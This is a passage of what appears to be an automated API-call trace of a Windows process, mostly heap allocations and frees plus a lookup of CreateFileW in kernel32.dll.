dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0078.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0078.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0078.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0078.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0078.946] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0078.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0078.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0078.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2430 [0078.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0078.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0078.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0078.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0078.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2440 [0078.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391dc8 [0078.947] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0078.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391dc8 | out: hHeap=0x1780000) returned 1 [0078.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0078.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0078.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2440 [0078.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0078.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0078.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2460 [0078.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0078.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0078.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2510 [0078.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0078.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2460 [0078.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0078.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2460 [0078.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0078.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0078.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0078.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca5c8 [0078.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0078.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0078.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0078.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0078.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0078.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0078.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0078.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0078.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0078.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0078.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0078.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0078.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0078.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0078.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0078.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0078.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0078.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0078.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0078.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0078.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0078.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0078.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0078.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0078.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0078.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0078.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0078.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0078.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b60 [0078.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0078.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0078.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0078.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0078.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0078.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0078.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0078.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0078.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0078.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0078.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0078.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0078.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0078.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0078.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0078.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0078.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0078.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0078.950] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0078.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0078.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0078.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0078.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0078.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0078.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0078.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0078.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0078.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0078.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0078.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0078.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0078.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0078.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0078.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0078.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0078.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0078.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0078.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0078.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0078.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0078.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0078.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0078.951] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0078.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0078.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0078.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0078.951] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0078.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0078.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0078.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0078.951] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0078.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0078.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0078.951] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0078.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0078.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0078.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0078.951] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0078.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0078.951] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0078.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0078.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0078.951] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0078.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0078.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0078.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0078.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0078.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0078.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0078.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0078.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0078.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0078.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0078.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0078.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0078.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0078.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0078.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0078.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0078.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0078.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0078.953] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0078.953] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0078.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0078.953] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0078.953] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0078.953] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0078.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0078.953] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0078.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0078.953] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0078.953] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0078.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0078.953] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0078.953] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0078.953] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0078.953] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0078.953] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0078.953] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0078.953] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0078.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0078.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0078.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0078.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0078.953] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0078.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0078.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0078.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0078.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0078.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0078.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0078.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0078.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0078.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0078.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0078.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0078.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0078.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0078.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0078.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0078.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0078.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0078.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0078.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0078.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0078.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0078.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0078.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0078.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0078.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0078.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0078.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0078.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0078.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0078.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0078.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0078.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0078.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0078.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0078.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0078.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0078.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0078.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0078.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0078.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0078.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0078.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0078.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0078.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0078.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0078.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0078.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0078.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0078.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0078.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0078.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0078.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0078.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0078.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0078.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0078.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0078.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0078.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0078.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0078.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0078.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0078.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0078.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0078.956] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0078.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0078.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0078.956] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caaf0 [0078.957] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43caaf0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0078.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0078.957] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0078.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0078.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0078.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0078.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0078.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0078.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0078.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0078.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0078.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0078.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0078.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x43eb3a8 [0078.957] HeapFree (in: hHeap=0x1780000, 